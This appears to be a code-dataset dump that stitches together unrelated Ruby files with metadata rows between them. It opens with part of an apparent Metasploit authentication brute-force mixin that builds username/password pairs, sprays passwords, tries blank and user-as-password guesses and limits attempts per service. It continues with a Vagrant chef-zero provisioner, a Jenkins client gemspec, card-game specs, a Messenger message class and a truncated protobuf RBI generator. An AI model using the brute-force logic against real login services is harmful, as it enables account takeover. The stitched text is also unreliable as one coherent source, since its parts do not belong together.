  @@credentials_skipped = {}
  @@credentials_tried = {}
  # NOTE(review): this reassignment clobbers the hash initialized above,
  # including any other services' counters -- confirm this is intentional.
  @@guesses_per_service = {}
  if datastore['MaxGuessesPerService'].to_i.abs == 0
    @@max_per_service = credentials.size
  else
    if datastore['MaxGuessesPerService'].to_i.abs >= credentials.size
      @@max_per_service = credentials.size
      print_brute(
        :level => :vstatus,
        :ip => datastore['RHOST'],
        :port => datastore['RPORT'],
        :msg => "Adjusting MaxGuessesPerService to the actual total number of credentials")
    else
      @@max_per_service = datastore['MaxGuessesPerService'].to_i.abs
    end
  end
  # Record the start time only when a time budget is configured.
  unless datastore['MaxMinutesPerService'].to_i.abs == 0
    @@brute_start_time = Time.now.utc
  end
end
# Builds the username list from USER_FILE, prepending USERNAME when set.
#
# NOTE(review): the reassignment of the local `credentials` below never
# reaches the caller (build_credentials_array ignores it) -- confirm whether
# the prepend_chosen_username call is intended to have any effect.
#
# @param credentials [Array, nil] existing [user, pass] pairs
# @return [Array<String>] the usernames to try
def load_user_vars(credentials = nil)
  users = extract_words(datastore['USER_FILE'])
  if datastore['USERNAME']
    users.unshift datastore['USERNAME']
    credentials = prepend_chosen_username(datastore['USERNAME'], credentials) if credentials
  end
  users
end
# Builds the password list from PASS_FILE, prepending PASSWORD when set.
#
# NOTE(review): as in #load_user_vars, the local `credentials` reassignment
# below never reaches the caller -- confirm intent.
#
# @param credentials [Array, nil] existing [user, pass] pairs
# @return [Array<String>] the passwords to try
def load_password_vars(credentials = nil)
  passwords = extract_words(datastore['PASS_FILE'])
  if datastore['PASSWORD']
    passwords.unshift datastore['PASSWORD']
    credentials = prepend_chosen_password(datastore['PASSWORD'], credentials) if credentials
  end
  passwords
end
# Takes protocol-specific username and password fields and, if present,
# prefers those over any given USERNAME or PASSWORD. Note, these special
# username/passwords should get deprecated some day.
# Note2: Don't use with SMB and FTP at the same time!
def translate_proto_datastores
  %w[SMBUser FTPUSER].each do |key|
    value = datastore[key]
    datastore['USERNAME'] = value if value && !value.empty?
  end
  %w[SMBPass FTPPASS].each do |key|
    value = datastore[key]
    datastore['PASSWORD'] = value if value && !value.empty?
  end
end
# Collapses credential pairs to unique usernames with blank passwords.
def just_uniq_users(credentials)
  credentials.map { |pair| [pair[0], ""] }.uniq
end
# Collapses credential pairs to unique passwords with blank usernames.
def just_uniq_passwords(credentials)
  credentials.map { |pair| ["", pair[1]] }.uniq
end
# Promotes the operator-chosen username: pairs it with every known password
# and places those pairs ahead of the original list.
def prepend_chosen_username(user,cred_array)
  promoted = cred_array.map { |pair| [user, pair[1]] }
  promoted + cred_array
end
# Promotes the operator-chosen password: pairs every known username with it
# and places those pairs ahead of the original list.
def prepend_chosen_password(pass,cred_array)
  promoted = cred_array.map { |pair| [pair[0], pass] }
  promoted + cred_array
end
# Prefixes the credential list with a blank-password attempt for every
# known username -- both standalone users and users from existing pairs.
def gen_blank_passwords(user_array,cred_array)
  blanks = user_array.map { |user| [user, ""] }
  cred_array.each { |user, _pass| blanks << [user, ""] }
  blanks + cred_array
end
# Prefixes the credential list with a user-as-password attempt for every
# known username -- both standalone users and users from existing pairs.
def gen_user_as_password(user_array,cred_array)
  mirrored = user_array.map { |user| [user, user] }
  cred_array.each { |user, _pass| mirrored << [user, user] }
  mirrored + cred_array
end
# Builds the ordered [user, pass] pair list from separate user and password
# arrays. Pairing order follows PASSWORD_SPRAY (password-major vs
# user-major), and pairs involving the chosen USERNAME/PASSWORD are
# promoted toward the front of the result.
def combine_users_and_passwords(user_array,pass_array)
  if (user_array.length + pass_array.length) < 1
    return []
  end
  combined_array = []
  if pass_array.empty?
    combined_array = user_array.map {|u| [u,""] }
  elsif user_array.empty?
    combined_array = pass_array.map {|p| ["",p] }
  else
    if datastore['PASSWORD_SPRAY']
      # Password-major: try one password against every user before moving on.
      pass_array.each do |p|
        user_array.each do |u|
          combined_array << [u,p]
        end
      end
    else
      # User-major: exhaust all passwords for a user before the next user.
      user_array.each do |u|
        pass_array.each do |p|
          combined_array << [u,p]
        end
      end
    end
  end

  creds = [ [], [], [], [] ] # userpass, pass, user, rest
  remaining_pairs = combined_array.length # counter for our occasional output
  interval = 60 # seconds between each remaining pair message reported to user
  next_message_time = Time.now + interval # initial timing interval for user message
  # Move datastore['USERNAME'] and datastore['PASSWORD'] to the front of the list.
  # Note that we cannot tell the user intention if USERNAME or PASSWORD is blank --
  # maybe (and it's often) they wanted a blank. One more credential won't kill
  # anyone, and hey, won't they be lucky if blank user/blank pass actually works!
  combined_array.each do |pair|
    if pair == [datastore['USERNAME'],datastore['PASSWORD']]
      creds[0] << pair
    elsif pair[1] == datastore['PASSWORD']
      creds[1] << pair
    elsif pair[0] == datastore['USERNAME']
      creds[2] << pair
    else
      creds[3] << pair
    end
    # Periodically tell the user how much pair-building work remains.
    if Time.now > next_message_time
      print_brute(
        :level => :vstatus,
        :msg => "Pair list is still building with #{remaining_pairs} pairs left to process"
      )
      next_message_time = Time.now + interval
    end
    remaining_pairs -= 1
  end
  return creds[0] + creds[1] + creds[2] + creds[3]
end
# Reads a wordlist file into an array of lines.
#
# @param wordfile [String, nil] path to the wordlist
# @return [Array<String>] one entry per line; empty when the file is
#   missing, unreadable, or cannot be opened
def extract_words(wordfile)
  return [] unless wordfile && File.readable?(wordfile)
  begin
    words = File.open(wordfile) { |f| f.read(f.stat.size) }
  rescue
    # Bug fix: this path previously returned nil, which crashed callers
    # that expect an Array (e.g. users.unshift in #load_user_vars).
    return []
  end
  words.split(/\r?\n/)
end
# Dereferences a "memory:<object_id>" locator back into a live Ruby object.
#
# NOTE(review): ObjectSpace._id2ref is unsafe if the referenced object has
# been garbage-collected (and is deprecated in newer Rubies) -- confirm the
# producer keeps a live reference to the object for the module's lifetime.
#
# @param memloc [String] locator of the form "memory:1234"
# @return [Object, nil] the referenced object, or nil when the locator
#   does not match the expected format
def get_object_from_memory_location(memloc)
  if memloc.to_s =~ /^memory:\s*([0-9]+)/
    id = $1
    ObjectSpace._id2ref(id.to_s.to_i)
  end
end
# Parses a USERPASS-style source into [user, pass] pairs. Accepts either a
# "memory:<id>" locator (delegated to #extract_word_pair_from_memory) or a
# path to a file with one "user pass" per line; the password half may itself
# contain whitespace, and a missing password becomes "".
#
# @param wordfile [String, nil] file path or memory locator
# @return [Array<Array(String, String)>] the parsed pairs (empty on
#   missing/unreadable files)
def extract_word_pair(wordfile)
  # The original initialized a dead `creds = []` before this branch.
  return extract_word_pair_from_memory(wordfile.to_s) if wordfile.to_s =~ /^memory:/
  return [] unless wordfile && File.readable?(wordfile)
  begin
    contents = File.open(wordfile) { |f| f.read(f.stat.size) }
  rescue
    return []
  end
  contents.split(/\n/).map do |line|
    user, pass = line.split(/\s+/, 2).map { |x| x.strip }
    [user.to_s, pass.to_s]
  end
end
# Pulls "user pass" credential lines out of an in-memory object referenced
# by a "memory:<object_id>" locator (see #get_object_from_memory_location).
# The object is expected to respond to #all_creds and, failing that, expose
# credential-importing builders via #builders.
#
# Honors @strip_passwords / @strip_usernames by blanking the corresponding
# half of each pair; in that case duplicates are collapsed with #uniq.
#
# @param memloc [String] locator of the form "memory:<object_id>"
# @return [Array<Array(String, String)>] hex-decoded [user, password] pairs
# @raise [ArgumentError] when the referenced object cannot be read
def extract_word_pair_from_memory(memloc)
  begin
    creds = []
    obj = get_object_from_memory_location(memloc)
    unless obj.all_creds.empty?
      these_creds = obj.all_creds
    else
      # Fall back to any builders that carry imported user lists.
      these_creds = obj.builders.select {|x| x.respond_to? :imported_users}.map {|b| b.imported_users}.flatten
    end
    these_creds.each do |cred|
      if @strip_passwords
        user = cred.split(/\s+/,2).map {|x| x.strip}[0]
        pass = ""
      elsif @strip_usernames
        user = ""
        pass = cred.split(/\s+/,2).map {|x| x.strip}[1]
      else
        user,pass = cred.split(/\s+/,2).map {|x| x.strip}
      end
      # Stored values may be %-hex encoded; decode before use.
      creds << [Rex::Text.dehex(user.to_s), Rex::Text.dehex(pass.to_s)]
    end
    # Stripping a column can create duplicate pairs, so dedupe then.
    if @strip_passwords || @strip_usernames
      return creds.uniq
    else
      return creds
    end
  rescue => e
    raise ArgumentError, "Could not read credentials from memory, raised: #{e.class}: #{e.message}"
  end
end
# Maps the BRUTEFORCE_SPEED datastore setting onto a delay in seconds
# between guesses: 0 is slowest (five minutes), 5 and anything
# unrecognized mean no delay at all.
def userpass_interval
  delays = { 0 => 60 * 5, 1 => 15, 2 => 1, 3 => 0.5, 4 => 0.1 }
  delays.fetch(datastore['BRUTEFORCE_SPEED'].to_i, 0)
end
# Sleeps for #userpass_interval seconds between guesses (via IO.select,
# which blocks only the calling thread); no-op when the interval is zero.
def userpass_sleep_interval
  delay = userpass_interval
  ::IO.select(nil, nil, nil, delay) unless delay == 0
end
# Verbose wrapper around #print_brute: forwards opts only when the
# VERBOSE datastore option is enabled. See #print_brute.
def vprint_brute(opts={})
  return unless datastore['VERBOSE']
  print_brute(opts)
end
# Verbose variant of print_status (suppressed unless VERBOSE is set).
def vprint_status(msg='')
  print_brute :level => :vstatus, :msg => msg
end
# Verbose variant of print_error (suppressed unless VERBOSE is set).
def vprint_error(msg='')
  print_brute :level => :verror, :msg => msg
end
alias_method :vprint_bad, :vprint_error
# Verbose variant of print_good (suppressed unless VERBOSE is set).
def vprint_good(msg='')
  print_brute :level => :vgood, :msg => msg
end
# Provides a consistent way to display messages about AuthBrute-mixed modules.
# Acceptable opts are fairly self-explanatory, but :level can be tricky.
#
# It can be one of status, good, error, or line (and corresponds to the usual
# print_status, print_good, etc. methods).
#
# If it's preceded by a "v" (ie, vgood, verror, etc), only print if
# datastore["VERBOSE"] is set to true.
#
# If :level would make the method nonsense, default to print_status.
#
# TODO: This needs to be simpler to be useful.
def print_brute(opts={})
  if opts[:level] and opts[:level].to_s[/^v/]
    # Verbose levels are silent unless VERBOSE; strip the "v" prefix
    # to recover the underlying print level.
    return unless datastore["VERBOSE"]
    level = opts[:level].to_s[1,16].strip
  else
    level = opts[:level].to_s.strip
  end
  # Accept several aliases for host and port, falling back to the
  # module's rhost/rport (when defined) and finally the datastore.
  host_ip = opts[:ip] || opts[:rhost] || opts[:host] || (rhost rescue nil) || datastore['RHOST']
  host_port = opts[:port] || opts[:rport] || (rport rescue nil) || datastore['RPORT']
  msg = opts[:msg] || opts[:message]
  proto = opts[:proto] || opts[:protocol] || proto_from_fullname
  complete_message = build_brute_message(host_ip,host_port,proto,msg)
  print_method = "print_#{level}"
  if self.respond_to? print_method
    self.send print_method, complete_message
  else
    # Unknown/empty level: fall back to a plain status line.
    print_status complete_message
  end
end
# Depending on the non-nil elements, build up a standardized
# auth_brute message.
#
# @param host_ip [String, nil] target address
# @param host_port [String, Integer, nil] target port
# @param proto [String, nil] protocol tag (e.g. "SSH")
# @param msg [String, nil] the message body
# @return [String] "ip:port - [tries/total] - msg" style message; when
#   msg already carries the ip/port/proto prefix it is returned as-is.
def build_brute_message(host_ip,host_port,proto,msg)
  ip = host_ip.to_s.strip if host_ip
  port = host_port.to_s.strip if host_port
  old_msg = msg.to_s.strip
  msg_regex = /(#{ip})(:#{port})?(\s*-?\s*)(#{proto.to_s})?(\s*-?\s*)(.*)/ni
  # Message already prefixed — don't double up.
  return old_msg if old_msg.match(msg_regex)

  complete_message = ''
  if ip.blank? && port.blank?
    # Bug fix: this used to read `complete_message << proto || 'Bruteforce'`,
    # which parses as `(complete_message << proto) || ...` and raised
    # TypeError whenever proto was nil. Parenthesize the fallback.
    complete_message << (proto || 'Bruteforce')
  else
    complete_message << "#{ip}:#{port}"
  end
  complete_message << " - "
  progress = tried_over_total(ip,port)
  complete_message << progress if progress
  complete_message << msg.to_s.strip
end
# Takes a credentials array, and returns just the first X involving
# a particular user, where X is the MaxGuessesPerUser datastore option
# (0 means unlimited). Original pair order is preserved.
def adjust_credentials_by_max_user(credentials)
  max = datastore['MaxGuessesPerUser'].to_i.abs
  return credentials if max == 0

  print_brute(
    :level => :vstatus,
    :msg => "Adjusting credentials by MaxGuessesPerUser (#{max})"
  )
  seen = Hash.new(0)
  credentials.select do |user, _pass|
    (seen[user] += 1) <= max
  end
end
# Fun trick: Only prints if we're already in each_user_pass, since
# only then is @@max_per_service defined.
#
# @return [String, nil] a "[current/total] - " progress prefix, or nil
#   when no bruteforce run is in flight (class variable undefined).
def tried_over_total(ip,port)
  total = self.class.class_variable_get("@@max_per_service") rescue nil
  return unless total
  total = total.to_i
  current_try = (@@guesses_per_service["#{ip}:#{port}"] || 1).to_i
  # Zero-pad the counter to the width of the total so columns line up.
  pad = total.to_s.size
  "[%0#{pad}d/%0#{pad}d] - " % [current_try, total]
end
# Protocols can nearly always be automatically determined from the
# name of the module, assuming the name is sensible like ssh_login or
# smb_auth. Returns the upcased protocol tag (e.g. "SSH"), or nil when
# the name doesn't follow the *_login/_auth/_identify convention.
def proto_from_fullname
  basename = File.split(self.fullname).last
  match = basename.match(/^(.*)_(login|auth|identify)/)
  match && match[1].upcase
rescue
  nil
end
# This method deletes the dictionary files if the corresponding
# REMOVE_* datastore option was requested. Deletion failures are
# deliberately ignored (best effort cleanup).
def cleanup_files
  {
    'USERPASS_FILE' => 'REMOVE_USERPASS_FILE',
    'USER_FILE'     => 'REMOVE_USER_FILE',
    'PASS_FILE'     => 'REMOVE_PASS_FILE'
  }.each do |file_option, remove_option|
    path = datastore[file_option]
    next unless path && datastore[remove_option]
    ::File.unlink(path) rescue nil
  end
end
end
end
| 36.338959 | 213 | 0.672446 |
1a63be73f39cc52c74e99e2a4d6db935ada47a16 | 7,789 | require "digest/md5"
require "securerandom"
require "set"
require "log4r"
require "vagrant/util/counter"
require_relative "base"
module VagrantPlugins
module Chef
module Provisioner
# This class implements provisioning via chef-zero.
# This class implements provisioning via chef-zero (chef-client in
# local mode against folders synced from the host).
class ChefZero < Base
  extend Vagrant::Util::Counter
  include Vagrant::Util::Counter
  include Vagrant::Action::Builtin::MixinSyncedFolders

  # Folder triples ([type, local_path, remote_path]) computed in #configure.
  attr_reader :environments_folders
  attr_reader :cookbook_folders
  attr_reader :role_folders
  attr_reader :data_bags_folders

  def initialize(machine, config)
    super
    @logger = Log4r::Logger.new("vagrant::provisioners::chef_zero")
    # Accumulates every folder registered via #share_folders.
    @shared_folders = []
  end

  # Expands the configured chef paths and registers each group as a
  # synced folder on the machine (skipping already-shared guest paths).
  def configure(root_config)
    @cookbook_folders = expanded_folders(@config.cookbooks_path, "cookbooks")
    @role_folders = expanded_folders(@config.roles_path, "roles")
    @data_bags_folders = expanded_folders(@config.data_bags_path, "data_bags")
    @environments_folders = expanded_folders(@config.environments_path, "environments")
    existing = synced_folders(@machine, cached: true)
    share_folders(root_config, "csc", @cookbook_folders, existing)
    share_folders(root_config, "csr", @role_folders, existing)
    share_folders(root_config, "csdb", @data_bags_folders, existing)
    share_folders(root_config, "cse", @environments_folders, existing)
  end

  # Installs chef if needed, validates the guest environment, uploads
  # configuration, and runs chef-client in the given mode.
  def provision(mode = :client)
    install_chef
    # Verify that the proper shared folders exist.
    check = []
    @shared_folders.each do |type, local_path, remote_path|
      # We only care about checking folders that have a local path, meaning
      # they were shared from the local machine, rather than assumed to
      # exist on the VM.
      check << remote_path if local_path
    end
    chown_provisioning_folder
    verify_shared_folders(check)
    verify_binary(chef_binary_path("chef-client"))
    upload_encrypted_data_bag_secret
    setup_json
    setup_zero_config
    run_chef(mode)
    delete_encrypted_data_bag_secret
  end

  # Converts paths to a list of properly expanded paths with types.
  def expanded_folders(paths, appended_folder=nil)
    # Convert the path to an array if it is a string or just a single
    # path element which contains the folder location (:host or :vm)
    paths = [paths] if paths.is_a?(String) || paths.first.is_a?(Symbol)
    results = []
    paths.each do |type, path|
      # Create the local/remote path based on whether this is a host
      # or VM path.
      local_path = nil
      remote_path = nil
      if type == :host
        # Get the expanded path that the host path points to
        local_path = File.expand_path(path, @machine.env.root_path)
        if File.exist?(local_path)
          # Path exists on the host, setup the remote path. We use
          # the MD5 of the local path so that it is predictable.
          key = Digest::MD5.hexdigest(local_path)
          remote_path = "#{@config.provisioning_path}/#{key}"
        else
          @machine.ui.warn(I18n.t("vagrant.provisioners.chef.cookbook_folder_not_found_warning",
            path: local_path.to_s))
          next
        end
      else
        # Path already exists on the virtual machine. Expand it
        # relative to where we're provisioning.
        remote_path = File.expand_path(path, @config.provisioning_path)
        # Remove drive letter if running on a windows host. This is a bit
        # of a hack but is the most portable way I can think of at the moment
        # to achieve this. Otherwise, Vagrant attempts to share at some crazy
        # path like /home/vagrant/c:/foo/bar
        remote_path = remote_path.gsub(/^[a-zA-Z]:/, "")
      end
      # If we have specified a folder name to append then append it
      remote_path += "/#{appended_folder}" if appended_folder
      # Append the result
      results << [type, local_path, remote_path]
    end
    results
  end

  # Shares the given folders with the given prefix. The folders should
  # be of the structure resulting from the `expanded_folders` function.
  def share_folders(root_config, prefix, folders, existing=nil)
    # Collect guest paths that are already shared so we don't re-share.
    existing_set = Set.new
    (existing || []).each do |_, fs|
      fs.each do |id, data|
        existing_set.add(data[:guestpath])
      end
    end
    folders.each do |type, local_path, remote_path|
      next if type != :host
      # If this folder already exists, then we don't share it, it means
      # it was already put down on disk.
      if existing_set.include?(remote_path)
        @logger.debug("Not sharing #{local_path}, exists as #{remote_path}")
        next
      end
      opts = {}
      # Counter makes each generated share id unique within the config.
      opts[:id] = "v-#{prefix}-#{self.class.get_and_update_counter(:shared_folder)}"
      opts[:type] = @config.synced_folder_type if @config.synced_folder_type
      root_config.vm.synced_folder(local_path, remote_path, opts)
    end
    @shared_folders += folders
  end

  # Writes the chef-zero (local mode) client.rb onto the guest.
  def setup_zero_config
    setup_config("provisioners/chef_zero/zero", "client.rb", {
      local_mode: true,
      enable_reporting: false,
      cookbooks_path: guest_paths(@cookbook_folders),
      roles_path: guest_paths(@role_folders),
      data_bags_path: guest_paths(@data_bags_folders).first,
      environments_path: guest_paths(@environments_folders).first,
    })
  end

  # Runs chef-client up to @config.attempts times, stopping as soon as a
  # run converges (exit status 0).
  def run_chef(mode)
    if @config.run_list && @config.run_list.empty?
      @machine.ui.warn(I18n.t("vagrant.chef_run_list_empty"))
    end
    if @machine.guest.capability?(:wait_for_reboot)
      @machine.guest.capability(:wait_for_reboot)
    end
    command = build_command(:client)
    @config.attempts.times do |attempt|
      if attempt == 0
        @machine.ui.info I18n.t("vagrant.provisioners.chef.running_#{mode}")
      else
        @machine.ui.info I18n.t("vagrant.provisioners.chef.running_#{mode}_again")
      end
      opts = { error_check: false, elevated: true }
      exit_status = @machine.communicate.sudo(command, opts) do |type, data|
        # Output the data with the proper color based on the stream.
        color = type == :stdout ? :green : :red
        data = data.chomp
        next if data.empty?
        @machine.ui.info(data, color: color)
      end
      # There is no need to run Chef again if it converges
      return if exit_status == 0
    end
    # If we reached this point then Chef never converged! Error.
    raise ChefError, :no_convergence
  end

  # Raises unless every expected shared folder exists on the guest.
  def verify_shared_folders(folders)
    folders.each do |folder|
      @logger.debug("Checking for shared folder: #{folder}")
      if !@machine.communicate.test("test -d #{folder}", sudo: true)
        raise ChefError, :missing_shared_folders
      end
    end
  end

  protected

  # Extracts only the remote paths from a list of folders
  def guest_paths(folders)
    folders.map { |parts| parts[2] }
  end
end
end
end
end
| 37.090476 | 102 | 0.596482 |
28c820c74a941a41c79bf98f2fa2518a5faa366d | 1,543 | lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'improved_jenkins_client/version'
Gem::Specification.new do |s|
  s.name = "improved_jenkins_client"
  s.version = ::JenkinsApi::Client::VERSION
  s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
  s.require_paths = ["lib"]
  s.authors = ["Kannan Manickam (the original jenkins_api_client gem)",
               "Yugabyte Engineering Team (improvements)"]
  # Fixed typos in the description: "programaticaly" -> "programmatically",
  # and the gem is based on jenkins_api_client (it previously described
  # itself as based on itself).
  s.description =
    "\nThis is a simple and easy-to-use Jenkins Api client with features focused on" +
    "\nautomating Job configuration programmatically. Based on the jenkins_api_client with" +
    "\nimprovements by Yugabyte engineering team."
  s.email = ["[email protected]"]
  s.executables = ['jenkinscli']
  # Ship only the library, executables, vendored Java deps, and gemspec.
  s.files = `git ls-files -z`.split("\x0").select { |f| f.match(%r{lib/|bin/|java_deps/|gemspec}) }
  # (Removed a duplicate `s.require_paths = ['lib']` that repeated the
  # assignment made above.)
  s.homepage = 'https://github.com/yugabyte-db/improved_jenkins_client'
  s.required_ruby_version = ::Gem::Requirement.new('>= 2.1')
  s.rubygems_version = "2.4.5.1"
  s.summary = "Improved Jenkins JSON API Client"
  s.licenses = ["MIT"]
  s.add_dependency 'nokogiri', '~> 1.6'
  s.add_dependency 'thor', '>= 0.16.0'
  s.add_dependency 'terminal-table', '>= 1.4.0'
  s.add_dependency 'mixlib-shellout', '>= 1.1.0'
  s.add_dependency 'socksify', '>= 1.7.0'
  s.add_dependency 'json', '>= 1.0'
  s.add_dependency 'addressable', '~> 2.7'
end
| 42.861111 | 107 | 0.687622 |
793ffd7bc513828831a9557c579d0d5243b72ae2 | 116 | $LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "uk_companies_house"
require "minitest/autorun"
| 23.2 | 58 | 0.767241 |
87e5dd58ab509689c2e3e005cbbacb20f343b06f | 1,076 | require "hand_helper"
require "rspec/its"
# Give Hand a concrete deck to draw from before the examples run.
Hand.deck = CardDeck::Deck.new
RSpec.describe Hand do
  describe "::MDHV" do
    # NOTE(review): MDHV reads like "minimum dealer hand value" (16) —
    # confirm against the Hand implementation.
    subject {Hand::MDHV}
    it {is_expected.to eq 16}
  end
  describe ".deck" do
    subject {Hand.deck}
    it {is_expected.to be_an_instance_of Array}
    its(:sample) {is_expected.to be_an_instance_of CardDeck::Card}
  end
  describe "#new" do
    context "when @cards == [#{CardDeck.Card 'Jack', 'diamonds'}, #{CardDeck.Card 'Ace', 'spades'}]" do
      # Jack + Ace is a natural blackjack and can never bust.
      subject {Hand.new [CardDeck.Card("Jack", 'diamonds'), CardDeck.Card("Ace", 'spades')]}
      it {is_expected.to have_blackjack}
      it {is_expected.to_not bust}
    end
    describe "hit" do
      s = Hand.new
      subject {s.cards}
      # Hitting a fresh two-card hand leaves three cards.
      s.hit
      its(:length) {is_expected.to eq 3}
    end
    describe "value" do
      context "when @cards == [#{CardDeck.Card 'Ace'}, #{CardDeck.Card 10}, #{CardDeck.Card 10}]" do
        hand = Hand.new [CardDeck.Card('Ace'), CardDeck.Card(10), CardDeck.Card(10)]
        subject {hand.value}
        # Ace must count as 1 here (1 + 10 + 10), not 11 (which would bust).
        it {is_expected.to eq 21}
      end
    end
  end
end
| 30.742857 | 103 | 0.631041 |
26688ec330adaa668668f9ab48100a7276333382 | 1,377 | # Copyright 2009 ThoughtWorks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Default url mappings are:
# a controller called Main is mapped on the root of the site: /
# a controller called Something is mapped on: /something
# If you want to override this, add a line like this inside the class
# map '/otherurl'
# this will force the controller to be mounted on: /otherurl
class MainController < EscController
  # Render actions inside the '/index' layout and expose the xhtml helper.
  layout '/index'
  helper :xhtml

  # the index action is called automatically when no other action is specified
  def index
    # Page title consumed by the '/index' layout template.
    @title = "Esc Serves Config"
  end

  # the string returned at the end of the function is used as the html body
  # if there is no template for the action. if there is a template, the string
  # is silently ignored
  def notemplate
    "there is no 'notemplate.xhtml' associated with this action"
  end
end
| 36.236842 | 78 | 0.734931 |
79bb901d3488d2eb52fc22fbb1b904d938020e89 | 4,981 | module Facebook
module Messenger
module Incoming
#
# Message class represents an incoming Facebook Messenger message event.
# @see https://developers.facebook.com/docs/messenger-platform/reference/webhook-events/messages
#
class Message
  include Facebook::Messenger::Incoming::Common

  #
  # @return [Array] Supported attachments for message.
  ATTACHMENT_TYPES = %w[image audio video file location fallback].freeze

  #
  # Function returns unique id of message
  # @see https://developers.facebook.com/docs/messenger-platform/reference/webhook-events/messages
  #   Info about received message format.
  #
  # @return [String] Unique id of message.
  #
  def id
    @messaging['message']['mid']
  end

  #
  # Sequence number ('seq') field of the message payload.
  #
  # @return [Integer, nil] sequence number, when the platform sends one.
  #
  def seq
    @messaging['message']['seq']
  end

  #
  # Function returns text of message
  #
  # @return [String] Text of message.
  #
  def text
    @messaging['message']['text']
  end

  #
  # Whether message is echo or not?
  #
  # @return [Boolean] If message is echo return true else false.
  #
  def echo?
    @messaging['message']['is_echo']
  end

  #
  # Function returns array containing attachment data
  # @see https://developers.facebook.com/docs/messenger-platform/send-messages#sending_attachments
  #   More info about attachments.
  #
  # @return [Array] Attachment data.
  #
  def attachments
    @messaging['message']['attachments']
  end

  #
  # If facebook messenger built-in NLP is enabled, message will
  # contain 'nlp' key in response.
  # @see https://developers.facebook.com/docs/messenger-platform/built-in-nlp
  #   More information about built-in NLP.
  #
  #
  # @return [Hash] NLP information about message.
  #
  def nlp
    @messaging['message']['nlp']
  end

  #
  # Function return app id from message.
  #
  # @return [String] App ID.
  #
  def app_id
    @messaging['message']['app_id']
  end

  #
  # This meta programming defines function for
  # every attachment type to check whether the attachment
  # in message is of defined type or not.
  # (e.g. #image_attachment?, #location_attachment?, ...)
  #
  ATTACHMENT_TYPES.each do |attachment_type|
    define_method "#{attachment_type}_attachment?" do
      attachment_type?(attachment_type)
    end
  end

  #
  # Get the type of attachment in message.
  #
  # @return [String] Attachment type.
  #
  def attachment_type
    return if attachments.nil?

    attachments.first['type']
  end

  #
  # Get the URL of attachment in message.
  # URL is only available for attachments of type image/audio/video/file.
  #
  # @return [String] URL of attachment.
  #
  def attachment_url
    return if attachments.nil?
    return unless %w[image audio video file].include? attachment_type

    attachments.first['payload']['url']
  end

  #
  # Get the location coordinates if attachment type is 'location'.
  # @example [LATITUDE, LONGITUDE]
  #
  # @return [Array] Location coordinates.
  #
  def location_coordinates
    return [] unless attachment_type?('location')

    coordinates_data = attachments.first['payload']['coordinates']
    [coordinates_data['lat'], coordinates_data['long']]
  end

  #
  # Get the payload of quick reply.
  # @see https://developers.facebook.com/docs/messenger-platform/send-messages/quick-replies
  #   More info about quick reply.
  #
  # @return [String] Payload string.
  #
  def quick_reply
    return unless @messaging['message']['quick_reply']

    @messaging['message']['quick_reply']['payload']
  end

  #
  # The 'tags' hash of the message payload, when present.
  #
  # @return [Hash, nil] tags metadata.
  #
  def tags
    messaging['message']['tags']
  end

  #
  # The 'source' entry of the message tags.
  # NOTE(review): raises NoMethodError when 'tags' is absent — callers
  # should prefer #from_widget?, which guards for presence.
  #
  # @return [String] tag source (e.g. 'customer_chat_plugin').
  #
  def source
    messaging['message']['tags']['source']
  end

  #
  # Whether the message originated from the customer chat plugin widget.
  #
  # @return [Boolean]
  #
  def from_widget?
    msg = messaging['message']
    msg['tags'].present? && msg['tags']['source'].present? && msg['tags']['source'] == 'customer_chat_plugin'
  end

  # @private
  private

  #
  # Check if attachment in message is of given type or not?
  #
  # @param [String] attachment_type Attachment type
  #
  # @return [Boolean] If type of attachment in message
  #   and provided attachment type are same then return true else false.
  #
  def attachment_type?(attachment_type)
    !attachments.nil? && attachments.first['type'] == attachment_type
  end
end
end
end
end
| 28.791908 | 115 | 0.563541 |
03835ca54f50c89e3e13366368ccfc5da99ac545 | 6,654 | # typed: strict
# frozen_string_literal: true
begin
require "google/protobuf"
rescue LoadError
return
end
module Tapioca
module Compilers
module Dsl
# `Tapioca::Compilers::Dsl::Protobuf` decorates RBI files for subclasses of
# [`Google::Protobuf::MessageExts`](https://github.com/protocolbuffers/protobuf/tree/master/ruby).
#
# For example, with the following "cart.rb" file:
#
# ~~~rb
# Google::Protobuf::DescriptorPool.generated_pool.build do
# add_file("cart.proto", :syntax => :proto3) do
# add_message "MyCart" do
# optional :shop_id, :int32, 1
# optional :customer_id, :int64, 2
# optional :number_value, :double, 3
# optional :string_value, :string, 4
# end
# end
# end
# ~~~
#
# this generator will produce the RBI file `cart.rbi` with the following content:
#
# ~~~rbi
# # cart.rbi
# # typed: strong
# class MyCart
# sig { returns(Integer) }
# def customer_id; end
#
#   sig { params(value: Integer).returns(Integer) }
# def customer_id=(value); end
#
# sig { returns(Integer) }
# def shop_id; end
#
# sig { params(value: Integer).returns(Integer) }
# def shop_id=(value); end
#
# sig { returns(String) }
# def string_value; end
#
# sig { params(value: String).returns(String) }
# def string_value=(value); end
#
#
# sig { returns(Float) }
# def number_value; end
#
# sig { params(value: Float).returns(Float) }
# def number_value=(value); end
# end
# ~~~
class Protobuf < Base
  # Internal value object describing one generated field: its name, the
  # accessor type, the (possibly wider) type accepted by #initialize,
  # and the default value expression used for the keyword parameter.
  class Field < T::Struct
    prop :name, String
    prop :type, String
    prop :init_type, String
    prop :default, String
  end

  extend T::Sig

  # Generates accessors and an #initialize signature for every field of
  # the protobuf message `constant`; the two generic container classes
  # get type members instead.
  sig { override.params(root: RBI::Tree, constant: Module).void }
  def decorate(root, constant)
    root.create_path(constant) do |klass|
      if constant == Google::Protobuf::RepeatedField
        create_type_members(klass, "Elem")
      elsif constant == Google::Protobuf::Map
        create_type_members(klass, "Key", "Value")
      else
        descriptor = T.let(T.unsafe(constant).descriptor, Google::Protobuf::Descriptor)
        fields = descriptor.map { |desc| create_descriptor_method(klass, desc) }
        # Deterministic output: keyword parameters sorted by field name.
        fields.sort_by!(&:name)
        parameters = fields.map do |field|
          create_kw_opt_param(field.name, type: field.init_type, default: field.default)
